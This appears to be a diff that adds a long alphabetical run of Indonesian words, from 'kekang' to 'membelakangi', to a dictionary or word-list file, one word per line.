+kekang
+kekangan
+kekar
+kekasaran
+kekasih
+kekebalan
+kekecewaan
+kekecilan
+kekecualian
+kekejaman
+kekejangan
+kekejian
+kekekalan
+kekelaman
+kekeliruan
+kekeluargaan
+kekentalan
+kekenyangan
+keker
+kekerabatan
+kekerapan
+kekerasan
+kekerdilan
+keketatan
+kekhasan
+kekhawatiran
+kekhilafan
+kekhususan
+kekompakan
+kekosongan
+kekuasaan
+kekuatan
+kekurangan
+kekusutan
+kelabakan
+kelabang
+kelabangan
+kelabilan
+kelabu
+keladi
+kelahi
+kelaikan
+kelainan
+kelakar
+kelakuan
+kelalaian
+kelam
+kelambanan
+kelamin
+kelana
+kelancungan
+kelangkaan
+kelangkan
+kelangkang
+kelangsungan
+kelanjutan
+kelapa
+kelar
+kelas
+kelasak
+kelasi
+kelatahan
+kelautan
+kelayakan
+kelayan
+kelayang
+kelayapan
+kelaziman
+kelebat
+kelebihan
+kelebu
+keledai
+kelek
+kelelahan
+kelelot
+keleluasaan
+kelemayar
+kelemayuh
+kelembahang
+kelembak
+kelembaman
+kelembapan
+kelengahan
+kelengangan
+kelengasan
+kelengkapan
+kelengkeng
+kelengkungan
+kelenjar
+kelentit
+kelenturan
+kelepasan
+kelepir
+kelereng
+kelesa
+kelesah
+kelesek
+kelesuan
+keletah
+keletihan
+kelewahan
+kelewatan
+kelicikan
+kelih
+kelihatan
+kelihatannya
+kelik
+keliling
+kelim
+keliman
+kelimun
+kelincahan
+kelinci
+kelindan
+kelindungan
+keling
+kelingking
+kelingsir
+kelintaran
+kelintasan
+kelip
+keliru
+kelok
+kelokan
+kelompok
+kelonet
+kelonggaran
+kelongkong
+kelongsong
+kelopak
+kelor
+kelu
+kelua
+keluak
+keluangan
+keluar
+keluaran
+keluarga
+keluasan
+kelucuan
+keluh
+keluhan
+keluhuran
+keluk
+kelulusan
+kelumpuhan
+kelumun
+keluwesan
+keluwung
+kemah
+kemahiran
+kemajemukan
+kemajuan
+kemakmuran
+kemalaman
+kemalangan
+kemalasan
+kemalingan
+kemaluan
+kemampuan
+kemandang
+kemandekan
+kemandirian
+kemandulan
+kemangkakan
+kemangkatan
+kemanisan
+kemanjuran
+kemantapan
+kemarahan
+kemarau
+kemari
+kemarin
+kemaruk
+kemas
+kemasan
+kemaslahatan
+kemasukan
+kemasygulan
+kemasyhuran
+kematian
+kemauan
+kemayu
+kembal
+kembali
+kembang
+kembar
+kembung
+kemegahan
+kemeja
+kemelitan
+kemelut
+kemenakan
+kemenangan
+kemenduaan
+kementakan
+kementerian
+kemerdekaan
+kemestian
+kemesu
+kemewahan
+kemih
+kemik
+kemiri
+kemiripan
+kemiskinan
+kemoceng
+kemodernan
+kempa
+kempang
+kempis
+kempot
+kempuh
+kempul
+kempung
+kemuakan
+kemubaziran
+kemudahan
+kemudi
+kemudian
+kemufakatan
+kemuliaan
+kemunafikan
+kemunculan
+kemuncup
+kemunduran
+kemungkinan
+kemungkus
+kemuraman
+kemurnian
+kemurungan
+kemuskilan
+kemusnahan
+kena
+kenahasan
+kenaikan
+kenakalan
+kenal
+kenalan
+kenamaan
+kenangan
+kenapa
+kencan
+kencana
+kencang
+kencar
+kenceng
+kencing
+kencong
+kencreng
+kencur
+kendala
+kendali
+kendang
+kendaraan
+kendati
+kendi
+kendil
+kendit
+kendur
+kenduri
+keneker
+kenes
+kenetralan
+kening
+kenisbian
+kenohong
+kenop
+kental
+kentara
+kentungan
+kenya
+kenyal
+kenyamanan
+kenyang
+kenyataan
+kenyit
+keok
+keonaran
+kepada
+kepadaan
+kepadatan
+kepaduan
+kepahitan
+kepahlawanan
+kepak
+kepakaran
+kepal
+kepala
+kepalan
+kepalang
+kepalsuan
+kepanasan
+kepancingan
+kepandaian
+kepandiran
+kepang
+kepanikan
+kepaniteraan
+kepanjangan
+kepantasan
+kepapaan
+kepariwisataan
+kepastian
+kepatihan
+kepatuhan
+kepatutan
+kepayahan
+kepayang
+kepecong
+kepedasan
+kepedihan
+kepedulian
+kepejalan
+kepek
+kepekaan
+kepekatan
+kepelesiran
+kepelikan
+kepenatan
+kependekan
+kepeng
+kepentingan
+keperawanan
+kepercayaan
+keperempuanan
+kepergian
+keperihan
+keperkasaan
+keperluan
+kepet
+kepialu
+kepiat
+kepicikan
+kepil
+kepiluan
+kepincangan
+kepincut
+kepindahan
+kepinding
+keping
+kepingan
+kepingin
+kepintaran
+kepis
+kepiting
+keplok
+keplokan
+kepolosan
+keponakan
+kepot
+kepriayian
+kepribadian
+keprihatinan
+keproduktifan
+kepuasan
+kepucatan
+kepudaran
+kepujanggaan
+kepuk
+kepulauan
+kepundan
+kepunyaan
+kepurun
+kepustakaan
+keputihan
+keputusan
+kepuyuk
+kera
+kerabang
+kerabat
+kerabit
+kerabu
+kerabunan
+keradikalan
+keragaman
+keraguan
+kerah
+kerai
+kerajaan
+kerajang
+kerajinan
+kerak
+kerakal
+kerakusan
+kerakyatan
+kerama
+keramahan
+keramaian
+keramat
+kerambit
+keramboja
+keramik
+keran
+kerancang
+kerancuan
+keranda
+kerang
+kerangka
+kerangkeng
+kerani
+keranjang
+keranjingan
+kerantong
+kerap
+kerapian
+keras
+kerat
+keratan
+keraton
+kerau
+kerawang
+kerawangan
+kerawat
+kerawit
+kerbau
+kercup
+kerdak
+kerdil
+kere
+kerebok
+kerecokan
+keredaan
+kerek
+kerekot
+kerelaan
+keremi
+keremot
+kerempeng
+keren
+kerendahan
+kerenggangan
+kerenyot
+kerepas
+kerepes
+keresahan
+kereseng
+kereta
+kerewelan
+keriaan
+keriangan
+keributan
+kericuhan
+keridas
+kerih
+kerik
+kerikil
+kerikit
+kerincing
+kering
+keringanan
+keringat
+kerinjal
+keriput
+kerisauan
+keriting
+keriuhan
+kerja
+kerlingan
+kerneli
+kernyih
+kernyit
+kernyut
+kero
+kerobohan
+keroh
+kerok
+kerokot
+kerongkongan
+kerongsang
+kerontang
+keropos
+kerosong
+kerotak
+keroyalan
+kersang
+kersik
+kertak
+kertas
+keruan
+kerucut
+kerudung
+kerugian
+keruh
+keruit
+kerukunan
+kerumitan
+kerumuk
+kerumunan
+keruncingan
+kerunsingan
+keruntuhan
+kerupuk
+kerusakan
+kerusuhan
+kerut
+keruwetan
+kesabaran
+kesadisan
+kesah
+kesahajaan
+kesahihan
+kesakralan
+kesaksamaan
+kesaksian
+kesaktian
+kesal
+kesalahan
+kesalehan
+kesalihan
+kesamaan
+kesamaran
+kesambet
+kesampaian
+kesampukan
+kesan
+kesandung
+kesangatan
+kesanggupan
+kesangsian
+kesasar
+kesastraan
+kesat
+kesatu
+kesatuan
+kesayangan
+kesayuan
+kesederajatan
+kesederhanaan
+kesediaan
+kesedihan
+keseganan
+kesegaran
+kesehatan
+keseimbangan
+kesejagatan
+kesejahteraan
+kesejajaran
+kesejukan
+keselak
+keselamatan
+keselapan
+keselarasan
+keseleo
+keseluruhan
+kesemarakan
+kesembronoan
+kesembuhan
+kesemek
+kesemestaan
+kesempatan
+kesempitan
+kesempurnaan
+kesemutan
+kesenangan
+kesendirian
+kesenduan
+kesengajaan
+kesenggol
+kesengsaraan
+kesengsem
+kesenian
+kesenioran
+kesentosaan
+kesentuhan
+kesenyapan
+kesepadanan
+kesepahaman
+kesepakatan
+kesepian
+keseragaman
+keserasian
+keserempakan
+keserentakan
+keseringan
+keseriusan
+kesertaan
+kesertamertaan
+kesesakan
+kesesatan
+kesesuaian
+keset
+kesetanan
+kesetiaan
+kesetiakawanan
+kesetimbalan
+kesetimbangan
+kesiagaan
+kesialan
+kesiangan
+kesibukan
+kesigapan
+kesinambungan
+kesintingan
+kesirikan
+kesisipan
+kesombongan
+kesomplok
+kesopanan
+kestabilan
+kesturi
+kesuburan
+kesucian
+kesudahan
+kesudian
+kesukaan
+kesukaran
+kesuksesan
+kesukuan
+kesulitan
+kesultanan
+kesumat
+kesumba
+kesungguhan
+kesungkanan
+kesunyian
+kesusahan
+kesusilaan
+ketaatasasan
+ketabahan
+ketahanan
+ketahuan
+ketai
+ketajaman
+ketak
+ketakjuban
+ketaksaan
+ketakutan
+ketam
+ketamakan
+ketampanan
+ketan
+ketang
+ketangguhan
+ketangkasan
+ketap
+ketapang
+ketat
+ketaya
+ketebalan
+ketegangan
+ketegaran
+ketegasan
+keteguhan
+keteguran
+ketekunan
+ketel
+ketela
+keteledoran
+ketelitian
+ketempuhan
+ketemu
+ketenangan
+ketenaran
+keteng
+ketengan
+ketentaraan
+ketenteraman
+ketentuan
+ketepatan
+ketepeng
+keterampilan
+keterandalan
+keterangan
+keterasingan
+keteraturan
+keterbukaan
+ketergantungan
+keterikatan
+keterjaminan
+keterkaitan
+keterkucilan
+keterlaluan
+keterlibatan
+keterpanaan
+keterpencilan
+keterpisahan
+ketersediaan
+ketertarikan
+ketertiban
+ketertutupan
+keterusan
+keterusterangan
+ketetapan
+keteter
+keteteran
+ketewasan
+keti
+ketiadaan
+ketiak
+ketibaan
+ketiding
+ketika
+ketilang
+ketimbang
+ketimbul
+ketimpangan
+ketinggalan
+ketip
+ketitir
+ketohoran
+ketola
+ketololan
+ketombe
+ketopong
+ketua
+ketuat
+ketuban
+ketuk
+ketukan
+ketul
+ketulahan
+ketulenan
+ketulusan
+ketumbu
+ketumbuhan
+ketungging
+ketupat
+ketupuk
+ketur
+keturunan
+ketus
+keuangan
+keugaharian
+keuletan
+keunggulan
+keunikan
+keuniversalan
+keuntungan
+keurus
+keuskupan
+keutamaan
+keutuhan
+kevakuman
+kewajaran
+kewajiban
+kewangian
+kewanitaan
+kewargaan
+kewarganegaraan
+kewartawanan
+kewaspadaan
+kewedanaan
+kewenangan
+kewibawaan
+kewiraan
+keyakinan
+kezaliman
+khalayak
+khali
+khalis
+khalwat
+khas
+khasiat
+khatam
+khatib
+khatulistiwa
+khawatir
+khayal
+khayalan
+khayali
+khazanah
+khianat
+khidmat
+khilaf
+khitah
+khitan
+khotbah
+khuluk
+khusus
+khusyuk
+kiai
+kial
+kialan
+kiamat
+kiambang
+kian
+kiap
+kiara
+kias
+kiasan
+kiat
+kibas
+kiblat
+kibul
+kibut
+kicau
+kidal
+kidul
+kidung
+kidungan
+kijang
+kik
+kikih
+kikir
+kikis
+kikuk
+kilah
+kilai
+kilang
+kilangangin
+kilap
+kilar
+kilas
+kilat
+kilatan
+kilau
+kili
+kilik
+kilir
+kimbang
+kimbul
+kimia
+kimpal
+kimput
+kinang
+kincir
+kincit
+kinerja
+kinetik
+kinetika
+kini
+kinja
+kinyang
+kios
+kipas
+kiprah
+kir
+kira
+kirab
+kirai
+kirana
+kiranya
+kirau
+kiri
+kirik
+kiriman
+kisah
+kisahan
+kisar
+kisaran
+kisi
+kisik
+kisruh
+kisut
+kitab
+kitiran
+klaim
+klakson
+klan
+klandestin
+klarifikasi
+klasifikasi
+klasik
+klem
+klenik
+klep
+klerek
+klien
+klik
+klimaks
+klimatologi
+klinik
+klinting
+klip
+klise
+kliyengan
+klop
+klub
+koalisi
+koar
+kobah
+kobakan
+kobar
+kobaran
+kober
+kobokan
+kobra
+kocak
+kocek
+kocok
+kodak
+kode
+kodian
+kodifikasi
+kodok
+kodrat
+kognisi
+kognitif
+koheren
+koherensi
+kohesi
+koin
+koitus
+koja
+kojoh
+kok
+koki
+kokila
+kolaborasi
+kolaborator
+kolam
+kolaps
+kolase
+kolateral
+kolega
+kolek
+koleksi
+kolektif
+kolesom
+kolokan
+kolokium
+kolom
+koloni
+kolonialis
+kolonialisme
+kolonisasi
+kolosal
+kolot
+kolusi
+komandan
+komando
+kombinasi
+kombor
+komedi
+komedian
+komendur
+komentar
+komentator
+komersial
+komet
+komidi
+komikal
+komisi
+komite
+komitmen
+komoditas
+kompak
+kompartemen
+kompas
+kompatibel
+kompensasi
+kompes
+kompeten
+kompetisi
+kompetitif
+kompetitor
+kompilasi
+kompleks
+kompleksitas
+komplemen
+komplet
+komplikasi
+komplimen
+komplot
+komplotan
+komponen
+kompor
+kompos
+komposisi
+komposit
+komprador
+komprang
+komprehensif
+kompres
+kompresi
+kompromi
+komputer
+komunal
+komune
+komunikasi
+komunike
+komunitas
+konco
+kondang
+konde
+kondisi
+kondisional
+kondominium
+kondor
+kondusif
+koneksi
+konfederasi
+konferensi
+konfigurasi
+konfirmasi
+konflik
+konformitas
+konfrontasi
+kongesti
+konglomerasi
+konglomerat
+kongregasi
+kongres
+kongsi
+konkaf
+konklusi
+konklusif
+konkret
+konkretisasi
+konon
+konotasi
+konotatif
+konsekuen
+konsekuensi
+konsekusi
+konsekutif
+konseling
+konselor
+konsensus
+konsentrasi
+konsentrat
+konsep
+konseptual
+konservasi
+konservatif
+konsesi
+konsinyasi
+konsisten
+konsistensi
+konsolasi
+konsolidasi
+konsorsium
+konspirasi
+konstan
+konstelasi
+konstituen
+konstruksi
+konstruktif
+konsul
+konsultasi
+konsumen
+konsumsi
+kontainer
+kontak
+kontaminasi
+kontan
+konteks
+kontemplasi
+kontemplatif
+kontemporer
+kontes
+kontestan
+kontet
+kontinen
+kontingen
+kontinu
+kontinuitas
+kontra
+kontradiksi
+kontradiktif
+kontrak
+kontraksi
+kontraktor
+kontras
+kontribusi
+kontributif
+kontributor
+kontrol
+kontroversi
+kontroversial
+kontur
+konvensi
+konvensional
+konversasi
+konversi
+konvoi
+konyol
+konyong
+kooperasi
+kooperatif
+koordinasi
+koordinator
+kop
+kopek
+kopi
+kopiah
+kopulasi
+koran
+korban
+kordial
+korek
+koreksi
+korektor
+korelasi
+koreng
+koreografer
+koresponden
+korespondensi
+koridor
+koroh
+korps
+korsel
+korting
+korup
+korupsi
+kosakata
+kosen
+kosmonaut
+kosmos
+kosong
+kostum
+kota
+kotak
+koteng
+kotes
+kotok
+kotor
+kotoran
+koyak
+kram
+krama
+kreasi
+kreatif
+kreativitas
+kreator
+kredibel
+kredibilitas
+kredit
+kreditor
+kredo
+kremasi
+krematorium
+krida
+kriminal
+kriminalitas
+krisis
+kristal
+kristalisasi
+kristen
+kriteria
+kritik
+kritikus
+kritis
+kroco
+kromatika
+kromo
+kroni
+kronik
+kronis
+kronologi
+kronologis
+kru
+krusial
+ksatria
+kuala
+kuali
+kualifikasi
+kualitas
+kualon
+kuantitas
+kuartal
+kuasa
+kuasi
+kuat
+kubak
+kubangan
+kubin
+kubis
+kubra
+kubu
+kubur
+kuburan
+kubus
+kucam
+kucandan
+kucing
+kucir
+kucup
+kucur
+kuda
+kudai
+kudap
+kudapan
+kudeta
+kudis
+kudu
+kuduk
+kudung
+kudus
+kue
+kuesioner
+kufu
+kufur
+kuis
+kujur
+kujut
+kukila
+kuku
+kukuh
+kukur
+kukus
+kulai
+kulat
+kuli
+kuliah
+kulir
+kulit
+kultivasi
+kultur
+kultus
+kulup
+kumal
+kuman
+kumandang
+kumat
+kumba
+kumbang
+kumbik
+kumbu
+kumis
+kumpai
+kumpal
+kumparan
+kumpul
+kumpulan
+kumuh
+kumulatif
+kunang
+kunci
+kuncian
+kuncung
+kuncup
+kundangan
+kundur
+kungkung
+kungkungan
+kuning
+kunjung
+kunjungan
+kuno
+kuntilanak
+kuntul
+kuntum
+kunyam
+kunyit
+kunyuk
+kuota
+kup
+kupa
+kupang
+kupasan
+kuping
+kuplet
+kupon
+kupu
+kura
+kurang
+kurangingat
+kurangnya
+kurap
+kurban
+kurik
+kuring
+kuriositas
+kurir
+kurma
+kursi
+kursif
+kursus
+kurun
+kurung
+kurus
+kurvatur
+kusam
+kusir
+kusta
+kusu
+kusuk
+kusuma
+kusut
+kutang
+kutil
+kutip
+kutipan
+kutu
+kutub
+kutuk
+kutukan
+kuwalat
+kuweni
+kuyu
+kuyup
+kwartir
+laba
+label
+labi
+labil
+labilitas
+labium
+laboratorium
+labu
+labuh
+lacur
+lada
+ladam
+ladan
+ladang
+ladung
+lafal
+laga
+lagak
+lagaknya
+lagam
+lagi
+lagu
+lahan
+lahang
+lahap
+lahar
+lahat
+lahir
+lahiriah
+laik
+lain
+lainan
+laja
+lajak
+lajang
+lajat
+laju
+lajur
+laki
+laknat
+lakon
+laksamana
+laksana
+laksatif
+laksmi
+laku
+lalai
+lalang
+lalap
+lalat
+lalu
+lalukan
+lama
+lamanya
+lamaran
+lamat
+lambaian
+lamban
+lambang
+lambat
+lambung
+lampau
+lampias
+lampin
+lampion
+lampiran
+lampit
+lampu
+lamtoro
+lamun
+lamunan
+lamur
+lancang
+lancar
+lancip
+lancung
+landai
+landas
+landasan
+langgam
+langgang
+langgar
+langgeng
+langit
+langka
+langkah
+langlang
+langsat
+langsing
+langsung
+lanjur
+lanjut
+lanjutan
+lanskap
+lantai
+lantak
+lantang
+lantaran
+lantas
+lantik
+lantun
+lantunan
+lantung
+lanturan
+lanun
+laos
+lap
+lapak
+lapang
+lapangan
+lapik
+lapis
+lapisan
+laporan
+lapuk
+lara
+larangan
+laras
+larat
+lari
+larik
+laris
+larut
+larutan
+larva
+laskar
+lata
+latah
+latar
+laten
+latihan
+laun
+laung
+laut
+lautan
+lava
+lawa
+lawak
+lawakan
+lawan
+lawas
+lawatan
+layak
+layang
+layar
+layon
+layu
+layuh
+layung
+lazim
+lazimnya
+lazuardi
+lebah
+lebar
+lebaran
+lebat
+lebih
+lebihkan
+lebu
+lebur
+leceh
+lecek
+lecet
+lecut
+ledak
+ledakan
+ledek
+ledekan
+lega
+legal
+legalisasi
+legalitas
+legenda
+legislatif
+legit
+legitimasi
+legiun
+lego
+legunder
+leha
+leher
+lekas
+lekat
+leksikograf
+leksikografi
+leksikon
+lektur
+lekuk
+lekukan
+lekum
+lelah
+lelaki
+lelang
+lelap
+lelatu
+leleh
+lelembut
+leler
+lelet
+leluasa
+lelucon
+leluhur
+lem
+lema
+lemah
+lemak
+lemari
+lemas
+lembaga
+lembah
+lembam
+lembang
+lembap
+lembar
+lembaran
+lembayung
+lembek
+lembing
+lembu
+lembur
+lembut
+lemon
+lempar
+lempeng
+lempung
+lena
+lencana
+lencang
+lenceng
+lendir
+lengah
+lengan
+lengang
+lengas
+lenggang
+lenggok
+lenggut
+lengkap
+lengkeng
+lengket
+lengking
+lengkuas
+lengkung
+lengos
+lengser
+lensa
+lentera
+lentik
+lenting
+lentong
+lentuk
+lentur
+lenyap
+lepas
+lepasan
+lepra
+lepuh
+lerai
+leret
+leretan
+les
+lesap
+lesi
+lestari
+lesu
+lesung
+lesus
+letak
+letih
+letupan
+letusan
+leukemia
+leukore
+level
+lever
+leveransir
+lewah
+lewat
+leyeh
+lezat
+liabel
+liabilitas
+liang
+liar
+liat
+libat
+liberal
+libido
+libra
+libur
+liburan
+licik
+licin
+lidah
+lidahan
+liga
+lihai
+lihat
+lihatan
+liku
+likuidasi
+lila
+lilin
+liliput
+lilit
+limas
+limau
+limbah
+limbung
+limbur
+limit
+limitasi
+limpa
+limpah
+lin
+lincah
+lincir
+lindap
+lindu
+lindung
+lindungan
+linggata
+linggis
+lingkap
+lingkar
+lingkaran
+lingkungan
+lingkup
+linglung
+linguis
+linguistik
+lini
+lintang
+lintangan
+lintas
+lintasan
+lintibang
+lintir
+linu
+lipan
+lipas
+lipat
+lipit
+lipstik
+lipur
+liputan
+lir
+lirih
+lirik
+lis
+lisan
+lisensi
+lisong
+listrik
+lisut
+literal
+literatur
+literer
+liturgi
+liuk
+liur
+liwa
+loak
+loakan
+loba
+log
+logam
+logat
+logika
+logis
+logistik
+loka
+lokakarya
+lokal
+lokasi
+lokomotif
+lolong
+lolos
+lomba
+lombok
+lompat
+lompong
+loncat
+loncatan
+lonceng
+longgar
+longgok
+longgokan
+longsor
+lonjak
+lonjong
+lontaran
+lonte
+loper
+lorek
+loreng
+lorong
+los
+losmen
+loteng
+lotre
+lotus
+lowong
+loyal
+loyalitas
+loyo
+luang
+luapan
+luar
+luas
+lubang
+luber
+lubuk
+lucah
+lucu
+lucut
+ludah
+ludes
+lugas
+lugu
+luhung
+luhur
+luka
+lukisan
+luks
+luku
+luluh
+lulur
+lulus
+lulusan
+lumat
+lumayan
+lumba
+lumbung
+lumer
+lumpuh
+lumpur
+lumrah
+lumut
+lunak
+lunas
+lunglai
+lungsur
+lunta
+luntur
+lupa
+luput
+lurah
+luruh
+lurus
+lusin
+lustrum
+lusuh
+lutut
+luwes
+luyu
+maaf
+maafan
+mabuk
+macak
+macam
+macan
+macapat
+macet
+macis
+madah
+madat
+madrasah
+madu
+madukara
+madya
+maesens
+maestro
+mafhum
+magang
+magasin
+magi
+magistrat
+magma
+magnet
+magrib
+mahabintang
+mahaduta
+mahaguru
+mahajana
+mahakarya
+mahakuasa
+mahal
+mahar
+maharaja
+maharajalela
+maharani
+mahardika
+mahdi
+maherat
+mahfuz
+mahir
+mahkamah
+mahkota
+mahligai
+main
+majal
+majalah
+majas
+majelis
+majemuk
+majenun
+majikan
+majir
+maju
+mak
+maka
+makalah
+makam
+makan
+makanan
+makanya
+makar
+makara
+makaroni
+makbul
+makcik
+makdan
+makelar
+makhluk
+maki
+makian
+makin
+maklum
+maklumat
+maklumlah
+makmum
+makmur
+makna
+maknawi
+makramat
+makrifat
+makro
+makrokosmos
+makruf
+maksila
+maksim
+maksimal
+maksimum
+maksud
+maksum
+maksyuk
+maktab
+makul
+makulat
+makyong
+mal
+mala
+malah
+malai
+malam
+malang
+malangap
+malap
+malapetaka
+malar
+malas
+malasan
+malih
+malik
+malim
+malis
+malit
+malitkan
+maltos
+malu
+maluan
+mama
+mamak
+mamalia
+maman
+mamanda
+mamang
+mambang
+mambar
+mambek
+mambo
+mambung
+mami
+mampal
+mampat
+mampir
+mampu
+mampus
+manah
+manai
+manajemen
+manajer
+manajerial
+manakala
+manakan
+manalagi
+manasi
+manasuka
+mancung
+mandala
+mandat
+mandek
+mandi
+mandibula
+mandir
+mandiri
+mandor
+mandraguna
+mandu
+mandub
+mandul
+mandung
+manfaat
+mangga
+manggah
+manggak
+manggala
+manggar
+mangir
+mangkak
+mangkar
+mangkat
+mangkel
+mangkih
+mangkir
+mangkubumi
+mangkuk
+mangkus
+mangsa
+mangsi
+mangu
+mani
+mania
+maniak
+manifes
+manifestasi
+manifesto
+manik
+manila
+manipulasi
+manir
+manis
+manisan
+manja
+manjang
+manjau
+manjur
+mansuh
+mantan
+mantap
+mantel
+mantik
+mantiki
+mantra
+mantri
+manual
+manusia
+manusiawi
+manuskrip
+manuver
+manyar
+mapak
+mapan
+mara
+marah
+marak
+marcapada
+marem
+marga
+margin
+marginal
+marhaban
+marhaen
+mari
+marikh
+marit
+maritim
+mariyuana
+markah
+markas
+marmer
+marmot
+mars
+martabat
+martil
+martir
+maruah
+marus
+marut
+mas
+masa
+masak
+masakan
+masalah
+masam
+masase
+masehi
+masif
+masih
+masin
+masing
+masinis
+masir
+masjid
+maskapai
+maskat
+maskawin
+masker
+maskodok
+maskulin
+maslahat
+masrum
+massa
+master
+masterplan
+mastistis
+masturbasi
+masuk
+masukan
+masyarakat
+masygul
+masyhur
+masyuk
+mata
+matahari
+matai
+matang
+matematika
+materi
+materialistis
+materiil
+mati
+matra
+matras
+matriks
+matros
+matur
+maturitas
+matut
+mau
+maujud
+maung
+maunya
+maut
+mawar
+mawas
+maya
+mayang
+mayapada
+mayat
+mayor
+mayoret
+mayoritas
+mazbah
+mazhab
+mebel
+medali
+medan
+media
+mediasi
+mediator
+medio
+medit
+meditasi
+meditatif
+medium
+medok
+mega
+megabintang
+megah
+megap
+megar
+megat
+megol
+meja
+mejam
+mejeng
+mekanik
+mekanisme
+mekar
+mekik
+mekonium
+melabeli
+melabrak
+melabuhkan
+melacak
+melacur
+meladeni
+melafalkan
+melagak
+melagakan
+melagakkan
+melagu
+melagukan
+melahap
+melahirkan
+melaini
+melainkan
+melajang
+melaju
+melajukan
+melaknat
+melakoni
+melakonkan
+melaksanakan
+melakukan
+melalaikan
+melalap
+melalui
+melalukan
+melamar
+melambai
+melambaikan
+melambangkan
+melambankan
+melambatkan
+melambungkan
+melampau
+melampaui
+melampiaskan
+melampiri
+melampirkan
+melampung
+melamun
+melancar
+melancarkan
+melancipkan
+melancong
+melancungkan
+melanda
+melandai
+melandasi
+melanggar
+melanggarkan
+melanggengkan
+melangit
+melangkah
+melangkahi
+melangsingkan
+melangsir
+melangsungkan
+melanjurkan
+melanjutkan
+melankoli
+melankolis
+melansir
+melantai
+melantak
+melantan
+melantangkan
+melantarkan
+melantas
+melantaskan
+melantik
+melantingkan
+melantun
+melantunkan
+melantur
+melapangkan
+melapik
+melapis
+melapor
+melaporkan
+melar
+melarang
+melaraskan
+melarat
+melarikan
+melarungkan
+melarutkan
+melase
+melata
+melatakan
+melatih
+melaung
+melaungkan
+melaut
+melawak
+melawan
+melawas
+melawat
+melayangkan
+melayani
+melayankan
+melayari
+melayat
+melayur
+melazimkan
+melebar
+melebarkan
+melebihi
+melebur
+meleburkan
+meleceh
+melecehkan
+melecut
+meledak
+meledakkan
+meleduk
+melegakan
+melegalisasi
+melegalkan
+melegitimasikan
+melejit
+melejitkan
+melek
+melekaskan
+melekat
+melekatkan
+melekuk
+melekukkan
+melelahkan
+melelapkan
+meleleh
+melelehkan
+melemah
+melembarkan
+melembek
+melembung
+melembungkan
+melembut
+melembutkan
+melempari
+melempem
+melempengkan
+melenakan
+melencangkan
+meleng
+melengah
+melengahkan
+melenggang
+melengkapi
+melengking
+melengkung
+melengkungkan
+melengserkan
+melentuk
+melentur
+melenturkan
+melenyapkan
+melepas
+melepasi
+melepaskan
+meler
+meleraikan
+meleretkan
+melesak
+melesap
+melesapkan
+melesat
+melestarikan
+melet
+meletakkan
+meletihkan
+meletup
+meletus
+meletuskan
+melewati
+melewatkan
+melezatkan
+melibas
+melibat
+melibatkan
+melicinkan
+melihat
+melihati
+melilit
+meliliti
+melilitkan
+melimpah
+melimpahi
+melindas
+melindungi
+melindur
+melingkari
+melingkarkan
+melingkung
+melingkungi
+melingkup
+melingkupi
+melingsir
+melingsirkan
+melintang
+melintangi
+melintangkan
+melintas
+melintasi
+melinting
+melipat
+melipatgandakan
+melipatkan
+melipit
+melipur
+meliput
+meliputi
+melisankan
+melit
+meliuk
+melodius
+melolong
+meloloskan
+melompat
+melompati
+melompong
+melonggarkan
+melonggokkan
+melongo
+melongok
+melonjak
+melontar
+melontari
+melontarkan
+melorongkan
+melowongkan
+meluangkan
+meluap
+meluarkan
+meluas
+meluaskan
+melubangi
+meluber
+melucu
+melucuti
+meludeskan
+meluhurkan
+melukai
+melukis
+melukiskan
+meluku
+melukut
+melulu
+meluluhkan
+meluluhlantakkan
+melulusi
+meluluskan
+melumangkan
+melumas
+melumatkan
+melumer
+melumpuhkan
+melumuri
+melunakkan
+melunasi
+melunaskan
+meluncur
+meluncurkan
+melunjurkan
+melupakan
+meluputkan
+meluruhkan
+meluruskan
+melut
+memaafkan
+memacak
+memacakkan
+memacetkan
+memacu
+memacul
+memadahkan
+memadai
+memadamkan
+memadankan
+memadati
+memadatkan
+memadukan
+memafhumi
+memagari
+memagut
+memahami
+memahamkan
+memahat
+memahfuzkan
+memahirkan
+memahitkan
+memair
+memairi
+memais
+memajankan
+memajuh
+memajukan
+memakai
+memakamkan
+memakan
+memakbulkan
+memaki
+memaklumatkan
+memaklumi
+memakmurkan
+memaknakan
+memaksakan
+memaksimalkan
+memaksudkan
+memaku
+memalai
+memalak
+memalam
+memalamkan
+memalang
+memalangi
+memalapkan
+memaling
+memalingkan
+memalis
+memalit
+memalsukan
+memalu
+memalun
+memalut
+memamah
+memampangkan
+memampas
+memampatkan
+memanas
+memanaskan
+memancang
+memancangkan
+memancar
+memancarkan
+memancing
+memancit
+memancung
+memancur
+memancurkan
+memandakkan
+memandang
+memandangi
+memandikan
+memandu
+memandulkan
+memanen
+memanfaatkan
+memang
+memanggang
+memanggungkan
+memangkal
+memangkalkan
+memangkas
+memangku
+memangsikan
+memangur
+memanifestasikan
+memanipulasi
+memanjakan
+memanjang
+memanjangkan
+memanjatkan
+memansuhkan
+memantai
+memantak
+memantangkan
+memantapkan
+memantas
+memantaskan
+memantati
+memantau
+memantek
+memantik
+memantrai
+memantulkan
+memapak
+memapar
+memapas
+memar
+memarahi
+memarak
+memarakkan
+memarang
+memarani
+memaras
+memarodikan
+memartil
+memaruh
+memasabodohkan
+memasak
+memasalahkan
+memasang
+memasangkan
+memasap
+memasarkan
+memasok
+memasrahkan
+memastikan
+memasuki
+memasukkan
+memasung
+memasyarakatkan
+memasygulkan
+memasyhurkan
+mematahkan
+mematar
+mematikan
+mematok
+mematri
+mematuhi
+mematuk
+mematung
+mematut
+mematutkan
+memaui
+memauk
+memaut
+memautkan
+memayahkan
+memayungi
+membabat
+membabatkan
+membabitkan
+membaca
+membacok
+membacokkan
+membadai
+membadut
+membagi
+membahagiakan
+membaham
+membahana
+membahas
+membahasakan
+membahayakan
+membahu
+membaiat
+membaik
+membajak
+membakar
+membaktikan
+membakukan
+membal
+membalah
+membalak
+membalas
+membalikkan
+membalun
+membalurkan
+membalut
+membaluti
+membalutkan
+membanat
+membancang
+membancuh
+membandar
+membandel
+membandingi
+membandingkan
+membandul
+membangatkan
+membanggakan
+membangkang
+membangkit
+membangkitkan
+membangun
+membangunkan
+membanjiri
+membantah
+membantai
+membantar
+membanting
+membantu
+membanyak
+membanyol
+membara
+membarengi
+membarengkan
+membariskan
+membarui
+membarut
+membasahi
+membasmi
+membasuh
+membatalkan
+membatas
+membatasi
+membatik
+membatinkan
+membatu
+membaui
+membaur
+membaurkan
+membawa
+membawahkan
+membawakan
+membawang
+membayang
+membayangkan
+membayankan
+membayar
+membayari
+membayonet
+membebani
+membebankan
+membebaskan
+membebat
+membebek
+membeberkan
+membedah
+membedakan
+membedaki
+membedel
+membedil
+membedol
+membegal
+membekali
+membekam
+membekas
+membeku
+membekuk
+membekukan
+membela
+membelah
+membelai
+membelakangi
